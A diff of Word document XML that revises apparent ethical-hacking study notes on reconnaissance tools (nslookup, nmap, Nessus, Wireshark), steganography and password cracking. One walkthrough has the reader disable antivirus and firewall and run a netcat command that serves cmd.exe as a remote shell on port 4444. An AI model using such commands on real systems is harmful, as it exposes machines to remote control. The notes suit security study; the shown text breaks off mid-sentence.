-        <w:t>Tracert</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> –w timeout</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Tracert</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> –</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>R :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>: trace round trip time</w:t>
+      <w:r>
+        <w:t>Tarcert –h maxhoops</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Tracert –w timeout</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Tracert –R :: trace round trip time</w:t>
       </w:r>
     </w:p>
     <w:p/>
     <w:p/>
     <w:p/>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>Nslookup</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve">Nslookup- </w:t>
+      </w:r>
+      <w:r>
+        <w:t>This command will fetch the DNS records for a given domain name or IP address. Remember the IP address and domain names are stored in DNS server, so the nslookup command lets you query the DNS records to gather information.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Ns-name server</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>A – associated names to IP.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Cname – canonical names.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Mx – mail exchange.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Ptr – point to record.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Loc – location</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>AAAA –IPV6 address</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Rp – responsible person</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">This command will fetch the DNS records for a given domain name or IP address. Remember the IP address and domain names are stored in DNS server, so the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nslookup</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> command lets you query the DNS records to gather information.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Ns-name server</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">A – </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>associated</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> names to IP.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Cname</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> – canonical names.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Mx</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> – mail exchange.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Ptr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> – point to record.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Loc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> – location</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>AAAA –IPV6 address</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Rp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> – responsible person</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
+        <w:t>Way back machine-</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> This is a website that archives all the websites. We can look up the traffic or the actual page of a website from time scale.</w:t>
+      </w:r>
+    </w:p>
     <w:p>
       <w:r>
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>Way back machine-</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> This is a website that archives all the websites. We can look up the traffic or the actual page of a website from time scale.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Httrack</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve"> –</w:t>
+        <w:t>Httrack –</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> This tool can be used to clone the websites.</w:t>
@@ -9092,19 +8283,11 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>Nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>-</w:t>
+        <w:t>Nmap-</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> This needs to be installed if in windows and does not require installation in kali.</w:t>
@@ -9117,20 +8300,12 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Detail description of all the types of </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> scans are given the website:</w:t>
+        <w:t>Detail description of all the types of nmap scans are given the website:</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:hyperlink r:id="rId108" w:history="1">
+      <w:hyperlink r:id="rId109" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -9141,62 +8316,17 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">But here are few that are most frequently </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>used :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">For finding out the target systems </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> address use- </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> –O target </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/address.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Or use </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> –O –PN target to find the systems </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>os</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> without pinging the system. This is use full when the target system has a fire wall installed.</w:t>
+        <w:t>But here are few that are most frequently used :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>For finding out the target systems ip address use- nmap –O target Ip/address.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Or use nmap –O –PN target to find the systems os without pinging the system. This is use full when the target system has a fire wall installed.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9209,35 +8339,7 @@
         <w:rPr>
           <w:rFonts w:eastAsia="Times New Roman"/>
         </w:rPr>
-        <w:t xml:space="preserve">TCP </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman"/>
-        </w:rPr>
-        <w:t>connect(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman"/>
-        </w:rPr>
-        <w:t>) scan (-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman"/>
-        </w:rPr>
-        <w:t>sT</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman"/>
-        </w:rPr>
-        <w:t>)</w:t>
+        <w:t>TCP connect() scan (-sT)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9250,15 +8352,7 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">This the default scanning technique used, if and only if the SYN scan is not an option, because the SYN scan requires root privilege. Unlike the TCP SYN scan, it completes the normal TCP three way handshake process and requires the system to call </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>connect(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>), which is a part of the operating system. Keep in mind that this technique is only applicable to find out the TCP ports, not the UDP ports.</w:t>
+        <w:t>This the default scanning technique used, if and only if the SYN scan is not an option, because the SYN scan requires root privilege. Unlike the TCP SYN scan, it completes the normal TCP three way handshake process and requires the system to call connect(), which is a part of the operating system. Keep in mind that this technique is only applicable to find out the TCP ports, not the UDP ports.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9286,63 +8380,13 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        <w:t># nmap -sT 192.168.1.1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
           <w:b/>
-          <w:bCs/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>sT</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 192.168.1.1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
         </w:rPr>
         <w:t>Nessus-</w:t>
       </w:r>
@@ -9359,7 +8403,7 @@
       <w:r>
         <w:t xml:space="preserve">To login we need to open the Nessus – This can be done by entering </w:t>
       </w:r>
-      <w:hyperlink r:id="rId109" w:anchor="/" w:history="1">
+      <w:hyperlink r:id="rId110" w:anchor="/" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -9373,15 +8417,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">We need to give the target website address or a system </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> to scan while creating a scan. And few types of scans require the credential of the system. </w:t>
+        <w:t xml:space="preserve">We need to give the target website address or a system ip to scan while creating a scan. And few types of scans require the credential of the system. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9390,42 +8426,29 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>Accunetix</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Accunetix-</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> This is another corporate scanning tool that scans the target system for vulnerabilities.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> This is another corporate scanning tool that scans the target system for vulnerabilities.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
         <w:t>Wireshark-</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> This is internet packet analyser tool. This captures the packets from a given IP. The packets captured can be analysed </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">and can be useful for identifying what kind of data or if not what data the target IP is using (the data can be seen only if it is </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>unencrypted )</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>and can be useful for identifying what kind of data or if not what data the target IP is using (the data can be seen only if it is unencrypted )</w:t>
+      </w:r>
       <w:r>
         <w:t>.</w:t>
       </w:r>
@@ -9473,13 +8496,8 @@
           <w:numId w:val="20"/>
         </w:numPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>NVD(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>National Vulnerability DB)- This website contains all the details of the new vulnerabilities found in different software.</w:t>
+      <w:r>
+        <w:t>NVD(National Vulnerability DB)- This website contains all the details of the new vulnerabilities found in different software.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9490,29 +8508,8 @@
           <w:numId w:val="20"/>
         </w:numPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>CVE(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">Common Vulnerability and Exposure)- This organisation is the one that finds the vulnerabilities in the software. The NVD is a Database that is maintained by </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>NIST(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">National Institute of Standard and Security). The CVE has </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>CNA(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> CVE numbering Authorities) which give a unique number to each vulnerability. The general format of the CVE number at this time is </w:t>
+      <w:r>
+        <w:t xml:space="preserve">CVE(Common Vulnerability and Exposure)- This organisation is the one that finds the vulnerabilities in the software. The NVD is a Database that is maintained by NIST(National Institute of Standard and Security). The CVE has CNA( CVE numbering Authorities) which give a unique number to each vulnerability. The general format of the CVE number at this time is </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9531,16 +8528,8 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>CVE-year-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>CVENumber</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>CVE-year-CVENumber</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -9622,15 +8611,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Disable all the network security tools like your anti-</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>virus ,</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> firewall and defender.</w:t>
+        <w:t>Disable all the network security tools like your anti-virus , firewall and defender.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9642,15 +8623,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Now download </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>netcat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> in both the systems.</w:t>
+        <w:t>Now download netcat in both the systems.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9662,15 +8635,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Open </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cmd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> as an administrator in both the systems.</w:t>
+        <w:t>Open cmd as an administrator in both the systems.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9682,15 +8647,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">In both the system move to the folder/directory of </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>netcat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>.</w:t>
+        <w:t>In both the system move to the folder/directory of netcat.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9708,43 +8665,13 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>nc.exe –</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>lvvp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 4444 –e cmd.exe</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">                                               </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>The</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> options l says listen, v says verbose and the p says port. The ‘4444’ in the above command is the port that we are o</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">pening. ‘-e’ for </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>execute ,</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> the next describes what should be executed.</w:t>
+        <w:t>nc.exe –lvvp 4444 –e cmd.exe</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">                                               The options l says listen, v says verbose and the p says port. The ‘4444’ in the above command is the port that we are o</w:t>
+      </w:r>
+      <w:r>
+        <w:t>pening. ‘-e’ for execute , the next describes what should be executed.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9799,15 +8726,7 @@
         <w:pStyle w:val="ListParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">This will get connected to the system through port 4444 and executes the command </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>pronmpt</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>.</w:t>
+        <w:t>This will get connected to the system through port 4444 and executes the command pronmpt.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9834,31 +8753,7 @@
         <w:t>Note-</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> There are many other IP address scanners which have a different UI and give different details. The advantage with the third party scanners is we can scan IP addresses in a given range instead of going one by one manually. Some of the IP scanners are: Advanced IP scan, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Currports</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, Global Inventory tool, Super scan and soft perfect scan. There is also another scanner that gives the banner of a device similar to </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> but is not as deep and useful as </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>.-ID serve.</w:t>
+        <w:t xml:space="preserve"> There are many other IP address scanners which have a different UI and give different details. The advantage with the third party scanners is we can scan IP addresses in a given range instead of going one by one manually. Some of the IP scanners are: Advanced IP scan, Currports, Global Inventory tool, Super scan and soft perfect scan. There is also another scanner that gives the banner of a device similar to nmap but is not as deep and useful as nmap.-ID serve.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9941,27 +8836,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Code: snow –C –m “message” –p “password” filename and </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>newfile_name</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>.                  [To hide the data]                                                                                                                                     Code:</w:t>
+        <w:t>Code: snow –C –m “message” –p “password” filename and newfile_name.                  [To hide the data]                                                                                                                                     Code:</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9989,7 +8864,7 @@
         </w:rPr>
         <w:pict>
           <v:shape id="_x0000_i1027" type="#_x0000_t75" style="width:413.25pt;height:216.75pt">
-            <v:imagedata r:id="rId110" o:title="snowoutput"/>
+            <v:imagedata r:id="rId111" o:title="snowoutput"/>
           </v:shape>
         </w:pict>
       </w:r>
@@ -10018,23 +8893,13 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>QuickStego</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>- This a third party app that hides information in a picture.</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>QuickStego- This a third party app that hides information in a picture.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10080,7 +8945,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId111">
+                    <a:blip r:embed="rId112">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -10170,7 +9035,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId112">
+                    <a:blip r:embed="rId113">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -10226,7 +9091,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId113">
+                    <a:blip r:embed="rId114">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -10277,7 +9142,7 @@
         <w:lastRenderedPageBreak/>
         <w:pict>
           <v:shape id="_x0000_i1028" type="#_x0000_t75" style="width:334.5pt;height:288.75pt">
-            <v:imagedata r:id="rId114" o:title="stealthmain"/>
+            <v:imagedata r:id="rId115" o:title="stealthmain"/>
           </v:shape>
         </w:pict>
       </w:r>
@@ -10375,23 +9240,10 @@
         <w:t>n</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> electronic assistance. In this method the attacker will simply gather some data and try different passwords to get access. This can also be called as </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Bruteforce</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Attack. Ex: Gather information like </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Userid</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, Date of birth, interested things and try </w:t>
+        <w:t xml:space="preserve"> electronic assistance. In this method the attacker will simply gather some data and try different passwords to get access. This can also be called as Bruteforce Attack. Ex: Gather information like </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Userid, Date of birth, interested things and try </w:t>
       </w:r>
       <w:r>
         <w:t>to break the password with</w:t>
@@ -10455,87 +9307,25 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Now if we see overview of the procedure first we start with getting the password </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hashdump</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> from the system now we will build a dictionary based on the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hashdump</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">. The dictionary built contains the </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">different combinations of selected type (it may be a lower </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>alpha ,</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> upper alpha, numeric , symbol or a combination of any) along with their </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hashcode</w:t>
-      </w:r>
